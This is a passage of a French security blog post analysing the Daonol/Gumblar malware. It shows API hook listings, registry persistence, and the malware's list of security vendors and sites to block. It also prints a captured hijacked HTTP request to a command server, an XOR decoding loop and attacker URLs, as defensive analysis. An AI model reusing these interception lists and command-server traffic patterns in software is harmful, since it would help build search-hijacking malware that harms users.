WS2_32.dll!WSARecv&#160;&#160;&#160;&#160; 719F4318 5 Bytes&#160; JMP 100028C0 <br />.text&#160; %windir%\system32\lsass.exe WS2_32.dll!recv&#160;&#160;&#160;&#160;&#160;&#160;&#160; 719F615A 5 Bytes&#160; JMP 10002838 <br />.text&#160; %windir%\system32\lsass.exe WS2_32.dll!WSASend&#160;&#160;&#160;&#160; 719F6233 5 Bytes&#160; JMP 10003A04 <br /><br />.text&#160; %windir%\system32\svchost.exe kernel32.dll!CreateProcessW&#160;&#160; 7C802332 5 Bytes&#160; JMP 10003B10 <br />.text&#160; %windir%\system32\svchost.exe ws2_32.dll!connect&#160;&#160; 719F406A 5 Bytes&#160; JMP 10003A3C <br />.text&#160; %windir%\system32\svchost.exe ws2_32.dll!send&#160;&#160;&#160;&#160;&#160; 719F428A 5 Bytes&#160; JMP 100031A0 <br />.text&#160; %windir%\system32\svchost.exe ws2_32.dll!WSARecv&#160;&#160; 719F4318 5 Bytes&#160; JMP 100028C0 <br />.text&#160; %windir%\system32\svchost.exe ws2_32.dll!recv&#160;&#160;&#160;&#160;&#160; 719F615A 5 Bytes&#160; JMP 10002838 <br />.text&#160; %windir%\system32\svchost.exe ws2_32.dll!WSASend&#160;&#160; 719F6233 5 Bytes&#160; JMP 10003A04 </font><br />----------------------------------------------------------------------------------------</p> 
<p>L'outil &quot;GMER&quot; affiche correctement les modifications, par contre
l'option &quot;Restore Code&quot; est inutile, une boucle qui utilise
WriteProcessMemory va aussitôt re-patcher le code. Une technique pour
analyser consiste à repérer les threads actifs qui ont été créés à
l'aide de CreateThread. Je précise que l'excellent <a title="ProcessExplorer" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=552&amp;entry_id=44"  onmouseover="window.status='http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx';return true;" onmouseout="window.status='';return true;">ProcessExplorer</a>
est aussi capable de fournir ce genre d'informations. Si les threads
similaires sur les processus qui m'ont été révélés par &quot;GMER&quot; sont tués
ça va stopper le code &quot;qui se déplace&quot; de processus en processus mais
c'est purement temporaire. Pourquoi ? C'est simple, si l'ordinateur est
arrêté, le mécanisme qui assure le redémarrage du programme va faire
son job. Autre point qui va intéresser nos amis des forums d'entre-aide
informatique et je sais qu'ils sont nombreux à nous lire: l'outil
&quot;HijackThis&quot; n'affiche aucune ligne suspecte. Pour comprendre, souvenez
vous des chaînes décryptées qui sont plus haut, nous avions une
référence à Drivers32. Allons voir ça à l'aide de l'éditeur de
registre. Mauvaise surprise, &quot;regedit&quot; ne fonctionne pas, pire il
relance &quot;explorer.exe&quot;. En effet, il n'est pas possible pour les
utilisateurs infectés d'accéder aux ressources qui font références à
&quot;reged&quot;, &quot;cmd&quot;, &quot;.bat&quot;, &quot;gmer&quot;, &quot;le38&quot;, &quot;/windows nt/&quot;. En écrivant ces
lignes, je me rends compte que je n'ai pas vérifié à quoi servait
&quot;le38&quot;, je pose l'hypothèse selon laquelle &quot;le38&quot; fait référence à RkU
LE v3.8 .Quand un programme semble bloqué, l'astuce la plus simple
consiste souvent à renommer le nom du fichier, on obtient alors:</p> 
<p>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32<br />&quot;aux&quot; - REG_SZ - &quot;%repdrop%\..\%alea%.ext&quot;</p> 
<p><em>nb: Ne vous fiez pas&#160;à &quot;aux&quot;, ça peut être &quot;aux1&quot; par exemple.</em></p> 
<p>Côté browser, il y a des fonctionnalités de blocage d'accès à certains éditeurs de solutions de sécurité:</p> 
<p><img src="http://mad.internetpol.fr/imgupz/mcafee.gif" alt="McAfee Blocked" /> </p> 
<p> </p> 
<p>Ci-dessous, sur le côté droit, on comprends que d'autres sites sont bloqués. <em>( cliquez sur l'image pour agrandir )</em><br /></p> 
<p><a href="http://mad.internetpol.fr/imgupz/snapdbg.png" target="_blank"><img alt="Look inside" src="http://mad.internetpol.fr/imgupz/ssnapdbg.png" /></a> </p> 
<p> </p> 
<p> </p> 
<p> </p> 
<p>Plus étonnant, l'accès au blog de notre amie <a title="Blogspot - Miekiemoes" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=645&amp;entry_id=44"  onmouseover="window.status='http://miekiemoes.blogspot.com/';return true;" onmouseout="window.status='';return true;">Miekiemoes</a> l'est aussi.<br /><br /><img src="http://mad.internetpol.fr/imgupz/miek.gif" alt="Blog - Miekiemoes" /><br />Le message vous indique que la méthode n'est pas valide. Et en effet, c'est le cas.</p> 
<p><img src="http://mad.internetpol.fr/imgupz/miek1.gif" alt="Methode HET" /></p> 
<p> </p> 
<p>L'habituelle méthode &quot;GET&quot; a été déformée, ce qui invalide la requête.&#160; <br /></p> 
<p> </p> 
<p>Les requêtes de l'utilisateur sont donc scannées à la recherche des
champs comme par exemple, &quot;Referer:&quot;, &quot;Host:&quot; ayant pour critères:
&quot;DaonolFix&quot;, &quot;miekiemoes&quot;,
&quot;mbam&quot;,&quot;clamav&quot;,&quot;prevx&quot;,&quot;mcafee&quot;,&quot;aolcdn&quot;,&quot;yimg&quot;,&quot;icq&quot;,&quot;yahoo&quot;
,&quot;live&quot;,&quot;msn&quot;, &quot;.google.&quot; + des combinaisons comme &quot;search.&quot; + {&quot;icq&quot;
ou &quot;yahoo&quot; ou &quot;live&quot; ou &quot;msn&quot;} + &quot;.&quot;</p> 
<p>En réalité, toutes vos requêtes sont espionnées et éventuellement traitées (ex: <em>détournements</em>)<br />Analysons, une requête envoyée sur un des serveurs contrôlés par les cybercriminels.<br /><div class="bb-code-title">Spy</div><div class="bb-quote">GET /x/?0D{%32chr}v2 HTTP/1.1<br />SS: /info-ops/cyberspace.htm HTTP/1.1<br />Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*<br />Referer: http://www.afcyber.af.mil/main/contactus.asp<br />Accept-Language: en<br />Accept-Encoding: gzip, deflate<br />User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br />Xost: www.au.af.mil<br />Connection: Keep-Alive<br />Host: 67.215.237.98<br />Cache-Control: no-cache</div>Ici, les données sont détournées sur 67.215.237.98, basé aux USA à Santa Ana en Californie.<br />Le champs &quot;SS: &quot; + &quot;Xost&quot; contiennent les valeurs qui composent les requêtes précédentes.<br />Le programme agira en fonction des réponses du serveur: exemple d'une réponse 302 (Found)</p> 
<p><div class="bb-code-title">302</div><div class="bb-quote">Location:
http://207.68.173.231/x/?i={xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}aHR0cDovL3d3dy5hdS5hZi5taWwvaW5mby1vcHMvY3liZXJzcGFjZS5odG0<br />&lt;a
//fHqqOHKNEEMP http://ontopdirectories.org/search.php?q=ops
.&gt;</div>La partie finale est encodée en b64 et correspond à la
requête de l'utilisateur.<br /></p> 
<p><em>nb: Les droppers sont également présent sur les serveurs.</em> req:&quot;/x/?0D{$string}&quot;<br /><img src="http://mad.internetpol.fr/imgupz/getdropper.gif" /></p> 
<p>En fonction des droppers analysés par le passé, nous savons que la
localisation des serveurs peuvent varier de même pour ce que vous
apercevez dans la capture ci-dessus, &quot;GCONNHED&quot; varie, exemple par
&quot;PKEMBIMD&quot;. Les serveurs &quot;67.215.237.98&quot; et &quot;67.215.246.34&quot; sont basés
à &quot;Santa Ana&quot; mais si on prends &quot;94.229.65.172&quot;, celui là est basé à
&quot;Moscow&quot; en &quot;Russie&quot;. Le rôle de la chaîne de caractères &quot;//fHqq&quot; ne
sera pas détaillé dans ce billet, tout comme d'autres fonctionnalités.
Concernant la DLL embed, les chaînes (<em>noms des sites bloqués, etc..</em>) étaient décodées comme ceci:</p> 
<p><font size="1" face="verdana,arial,helvetica,sans-serif">@DecStr:<br />
&#160; XOR DWORD PTR DS:[EAX],<strong style="color: #785e2b;">49C0B781</strong><br />
&#160; ADD EDI,4<br />
&#160; MOV EAX,EDI<br />
&#160; CMP DWORD PTR DS:[EAX],96505356<br />
&#160; JNZ @DecStr<br />
&#160; PUSH 1</font></p> 
<p>Finalement, l'information de départ était dirigée sur de fausses hypothèses &quot;<em>pirate isolé, attaque ciblée envers le PSG&quot;</em>
alors qu'il s'agit de l'œuvre de groupes structurés qui attaquent
massivement des
milliers de sites dans le monde. Aujourd'hui, ce site est toujours
contrôlé par les pirates, ils font même des mises à jour:<div class="bb-code-title">Tue, 12
May 2009 15:06:06 GMT</div><div class="bb-quote">http://telemedia.m77s.cn/local/index.php<br />http://qwu11a.biz:80/cpanel/index.php</div></p> 
<p>Les deux sites stipulés dans les articles sont hébergés chez 1&amp;1
et appartiennent au même client: le propriétaire se serait-il fait
voler ses identifiants ? Le journaliste utilisant le pseudonyme de
Damien Bancal a eu l'amabilité de nous répondre. Il a tenté d'entrer en
contact avec le responsable légal du site mais ça n'a abouti à rien ; à
notre tour, nous avons tenté de téléphoner, en vain. Un mot de soutient
à <a title="Zataz" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=554&amp;entry_id=44"  onmouseover="window.status='http://www.zataz.com/';return true;" onmouseout="window.status='';return true;">Zataz</a>
; ce site est souvent l'objet de polémiques pour X ou Y raisons: moi
même, il m'arrive parfois de manifester mon mécontentement (<em>quelle belle formule de style</em>)
sur les titres accrocheurs qui dénaturent et déforment les sujets
MAIS.. avouez tout de même que depuis sa création en 1998, c'est devenu
un coin incontournable pour les commérages et si vous avez suffisamment
de bon sens, vous comprenez tout de suite pourquoi: c'est l'e-zine des
cyber potins par excellence, le &quot;<a title="Voici" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=555&amp;entry_id=44"  onmouseover="window.status='http://en.wikipedia.org/wiki/Voici';return true;" onmouseout="window.status='';return true;">Voici</a>&quot;
de l'underground. A partir du moment où vous en avez conscience, il
suffit d'extraire les informations avec des pincettes et de vérifier
vous même les faits&#160;qui vous intéressent tout comme vous le feriez avec
n'importe quel site.</p> 
<p>Quant aux auteurs de daonol, ils semblent considérer mon amie miekiemoes au même
rang que des sociétés comme Prevx ou McAfee ; ils ajoutent ici et là
de petits indices ; le nom du cookie, le blocage de son blog, les
propriétés des fichiers ( <a title="http://miekiemoes.blogspot.com/2009/01/miekiemoes-rules-yeah-right.html" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=559&amp;entry_id=44"  onmouseover="window.status='http://miekiemoes.blogspot.com/2009/01/miekiemoes-rules-yeah-right.html';return true;" onmouseout="window.status='';return true;">Miekiemoes rules ?? Yeah right...</a> ) - <strong>SUPERSTAR !</strong>
C'est vrai, le titre de ce billet est léger et amusant mais ne pensez
vous pas que c'est peut être pour adoucir l'affaire Gumblar qui l'est
beaucoup moins.<br /></p> 
<p align="left"><img alt="Artist: Miekiemoes " src="http://mad.internetpol.fr/imgupz/miekie_artist_dogs.jpg" /> </p> 
<p>She's also a great artist :]=~</p> 
<p>Informations techniques: <br />- <a href="http://mad.internetpol.fr/exit.php?url_id=563&amp;entry_id=44"  onmouseover="window.status='http://blog.scansafe.com/journal/2009/5/8/google-serps-redirections-turn-to-bots.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Google SERPs Redirections Turn to Bots">Google SERPs Redirections Turn to Bots</a> ( May 8, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=549&amp;entry_id=44"  onmouseover="window.status='http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Gumblar Exploit - 12 Facts About This Injected Script">Gumblar Exploit - 12 Facts About This Injected Script</a> ( May 10, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=562&amp;entry_id=44"  onmouseover="window.status='http://www.sophos.com/blogs/sophoslabs/?p=4405';return true;" onmouseout="window.status='';return true;" target="_blank" title="Troj/JSRedir-R: A high number of compromised sites">Troj/JSRedir-R: A high number of compromised sites</a> ( May 13, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=564&amp;entry_id=44"  onmouseover="window.status='http://blog.scansafe.com/journal/2009/5/14/gumblar-attacks-up-another-80.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Gumblar Attacks Up Another 80%">Gumblar Attacks Up Another 80%</a> ( May 14, 2009 )<br />- <a title="Malicious JSRedir-R script found to be biggest malware threat on the web!" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=577&amp;entry_id=44"  onmouseover="window.status='http://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web/';return true;" onmouseout="window.status='';return true;">Malicious JSRedir-R script found to be biggest malware threat on the web!</a> ( May 14, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=565&amp;entry_id=44"  onmouseover="window.status='http://blog.scansafe.com/journal/2009/5/14/gumblar-compromises-now-up-188.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Gumblar Compromises Now Up 188%">Gumblar Compromises Now Up 188% !</a> ( May 14, 2009 )<br />- <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=566&amp;entry_id=44" title="http://blog.scansafe.com/journal/2009/5/14/gumblar-qa.html"  onmouseover="window.status='http://blog.scansafe.com/journal/2009/5/14/gumblar-qa.html';return true;" onmouseout="window.status='';return true;">Gumblar Questions &amp; Answers</a> ( May 14, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=567&amp;entry_id=44"  onmouseover="window.status='http://www.sophos.com/blogs/sophoslabs/?p=4422';return true;" onmouseout="window.status='';return true;" target="_blank" title="Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks.">Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks </a>( May 14, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=598&amp;entry_id=44"  onmouseover="window.status='http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Martuz .cn - New Incarnation of the Gumblar Exploit. So What's New?">Martuz .cn - New Incarnation of the Gumblar Exploit. So What's New?</a> ( May 18, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=601&amp;entry_id=44"  onmouseover="window.status='http://securitylabs.websense.com/content/Blogs/3401.aspx';return true;" onmouseout="window.status='';return true;" target="_blank" title="Websense Security Labs - Gumblar - An Analysis &amp; History">Websense Security Labs - Gumblar - An Analysis &amp; History</a> ( May 21, 2009 )<br />- <a title="Gumblar/Martuz Aftermath" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=636&amp;entry_id=44"  onmouseover="window.status='http://blog.unmaskparasites.com/2009/05/26/gumblar-martuz-aftermath/';return true;" onmouseout="window.status='';return true;">Gumblar/Martuz Aftermath</a> ( May 26 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=637&amp;entry_id=44"  onmouseover="window.status='http://blogs.technet.com/mmpc/archive/2009/05/27/gamburl-gone-wild.aspx';return true;" onmouseout="window.status='';return true;" target="_blank" title="Microsoft Malware Protection Center - Gamburl Gone Wild">Microsoft Malware Protection Center - Gamburl Gone Wild</a> ( May 27 2009 )<br />- <a title="Websense Security Labs - Gumblar - An Update" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=646&amp;entry_id=44"  onmouseover="window.status='http://securitylabs.websense.com/content/Blogs/3414.aspx';return true;" onmouseout="window.status='';return true;">Websense Security Labs - Gumblar - An Update</a> ( June 4, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=648&amp;entry_id=44"  onmouseover="window.status='http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="CyberCrime - Gumblar's 48,000 Compromised Domains Makes the Web a Dangerous Place">Gumblar's 48,000 Compromised Domains Makes the Web a Dangerous Place</a> ( June 7, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=675&amp;entry_id=44"  onmouseover="window.status='http://blog.unmaskparasites.com/2009/06/18/beladen-elusive-web-server-exploit/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Beladen - Elusive Web Server Exploit. (information for site owners and hosting providers)">Beladen - Elusive Web Server Exploit.</a> - <em>information for site owners &amp; hosting providers</em> ( June 18, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=686&amp;entry_id=44"  onmouseover="window.status='http://blog.trendmicro.com/gumblar-invades-best-buy/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Gumblar Invades Best Buy">Gumblar Invades Best Buy</a> ( July 2, 2009)<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=791&amp;entry_id=44"  onmouseover="window.status='http://www.xmcopartners.com/actu-secu/XMCO-ActuSecu-23-Koobface-Gumblar.pdf';return true;" onmouseout="window.status='';return true;" target="_blank" title="Les attaques 2.0 : quand les pirates passent à l'action">Koobface, Gumblar, Slowloris, Antisec</a> (September 18, 2009 - ActuSécu XMCO n°23) <br />- <a href="http://mad.internetpol.fr/exit.php?url_id=783&amp;entry_id=44"  onmouseover="window.status='http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Gumblar Website Botnet Awakes">Gumblar Website Botnet Awakes</a> ( Mary Landesman ( October 15, 2009 ))<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=784&amp;entry_id=44"  onmouseover="window.status='http://blog.scansafe.com/journal/2009/10/20/zeus-bot-joins-gumblar-attacks.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Zeus Bot Joins Gumblar Attacks">Zeus Bot Joins Gumblar Attacks</a> ( Mary Landesman ( October 20, 2009 ))<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=785&amp;entry_id=44" title="http://blog.fireeye.com/research/2009/10/gumblar-not-gumby.html"  onmouseover="window.status='http://blog.fireeye.com/research/2009/10/gumblar-not-gumby.html';return true;" onmouseout="window.status='';return true;" target="_blank">Gumblar... Not Gumby!</a> ( FireEye Malware Intelligence Lab ( October 23, 2009 ))<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=786&amp;entry_id=44"  onmouseover="window.status='http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Revenge of Gumblar Zombies">Revenge of Gumblar Zombies</a> ( Unmask Parasites Blog ( October 23, 2009 ))</p> 
<p><br />Articles de presse:<br />- <a title="New Wave of Gumblar Hacked Sites Installs Google targeting Malware" href="http://mad.internetpol.fr/exit.php?url_id=570&amp;entry_id=44"  onmouseover="window.status='http://www.pcworld.com/article/164899/new_wave_of_gumblar_hacked_sites_installs_googletargeting_malware.html';return true;" onmouseout="window.status='';return true;" target="_blank">New Wave of &quot;Gumblar&quot; Hacked Sites Installs Google-targeting Malware</a> ( May 14, 2009 )<br />- <a title="- Google vs. Gumblar: Search Engine Abused in New Round of Stealthy Attacks" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=569&amp;entry_id=44"  onmouseover="window.status='http://www.eweek.com/c/a/Security/Google-vs-Gumblar-Search-Engine-Abused-in-New-Round-of-Stealthy-Attacks-664608/';return true;" onmouseout="window.status='';return true;">Google vs. Gumblar: Search Engine Abused in New Round of Stealthy Attacks</a> ( May 14, 2009 )<br />- <a title="Rapidly Spreading 'Gumblar' Attack Redirects Users' Web Searches" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=579&amp;entry_id=44"  onmouseover="window.status='http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=217500218';return true;" onmouseout="window.status='';return true;">Rapidly Spreading 'Gumblar' Attack Redirects Users' Web Searches</a>  ( May 14, 2009 )<br />- <a title="Viral web infection siphons ad dollars from Google" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=580&amp;entry_id=44"  onmouseover="window.status='http://www.theregister.co.uk/2009/05/14/viral_web_infection/';return true;" onmouseout="window.status='';return true;">Viral web infection siphons ad dollars from Google</a> ( May 14, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=572&amp;entry_id=44"  onmouseover="window.status='http://www.telegraph.co.uk/scienceandtechnology/technology/technologynews/5330044/New-computer-virus-on-rise-warn-security-experts.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="New computer virus on rise, warn security experts">New computer virus on rise, warn security experts</a> ( May 15, 2009 )<br />- <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=576&amp;entry_id=44"  onmouseover="window.status='http://www.vnunet.com/vnunet/news/2242317/gumblar-attack-explodes-web';return true;" onmouseout="window.status='';return true;" title="Gumblar attack explodes across the web">'Gumblar' attack explodes across the web</a> ( May 15, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=574&amp;entry_id=44"  onmouseover="window.status='http://www.onlinekosten.de/news/artikel/34388/0/Trojaner-leitet-Google-Nutzer-auf-gefaelschte-Seiten';return true;" onmouseout="window.status='';return true;" target="_blank" title="Trojaner leitet Google-Nutzer auf gefälschte Seiten">Trojaner leitet Google-Nutzer auf gefälschte Seiten</a> ( May 15, 2009 )</p> 
<p> </p> 
<p><font face="tahoma,arial,helvetica,sans-serif"><font size="2"><strong style="color: #c30000;">Gumblar Malware Exploit Circulating</strong></font> added May 18, 2009 at 12:47 pm<br />US-CERT
is aware of public reports of a malware exploit circulating. This is a
drive-by-download exploit with multiple stages and is being referred to
as Gumblar. The first stage of this exploit attempts to compromise
legitimate websites by injecting malicious code into them. Reports
indicate that these website infections occur primarily through stolen
FTP credentials but may also be compromised through poor configuration
settings, vulnerable web applications, etc.&#160; The second stage of this
exploit occurs when users visit a website compromised by Gumblar. Users
who visit these compromised websites and have not applied updates for
known PDF and Flash Player vulnerabilities may become infected with
malware. This malware may be used by attackers to monitor network
traffic and obtain sensitive information, including FTP and login
credentials, that can be used to conduct further exploits.
Additionally, this malware may also redirect Google search results for
the infected user. US-CERT encourages users and administrators to apply
software updates in a timely manner and use up-to-date antivirus
software to help mitigate the risks.</font><br /></p> 
<p> <br /></p> 
            </div>
        </content>
        
    </entry>

</feed>